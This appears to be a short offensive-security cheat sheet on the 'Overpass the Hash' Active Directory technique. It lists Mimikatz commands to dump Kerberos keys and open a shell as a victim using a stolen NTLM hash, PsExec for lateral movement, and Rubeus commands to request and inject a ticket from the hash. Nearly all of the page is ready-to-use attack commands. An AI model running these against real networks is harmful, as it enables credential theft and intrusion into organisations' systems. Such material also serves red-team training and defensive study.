Overpass the Hash

Only with NTLMv1.

Turn a Kerberos Key (these include the NTLM hash, RC4) of a domain user into a Kerberos Ticket (TGT), and use it for authentication. Valid only for the machine for which it was created.

Mimikatz

Requires Administrator Privileges

View Kerberos Keys

.\mimikatz.exe    
> privilege::debug
> sekurlsa::ekeys

New CMD with victim user.

> sekurlsa::pth /domain:<DOMAIN> /user:<USER> /ntlm:<KEY/NTLM> [/run:Powershell.exe]

There is also /rc4,/aes128 or /aes256

After that, in the new terminal with the victim's ticket you can

net use //<ComputerName>
PsExec.exe \\<ComputerName> cmd.exe -accepteula

Rubeus

NOT Requires Administrator Privileges

Create new TGT for given user, view it and then upload it (like it was a cookie).

.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /nowrap 
# printed in base64

.\Rubeus.exe ptt /ticket:<BASE64_TICKET>

Or create new TGT for given user and upload it immediately without displaying it.

.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /ptt

Also possible to use: /aes128, /aes256, /des

Last updated 8 months ago

Was this helpful?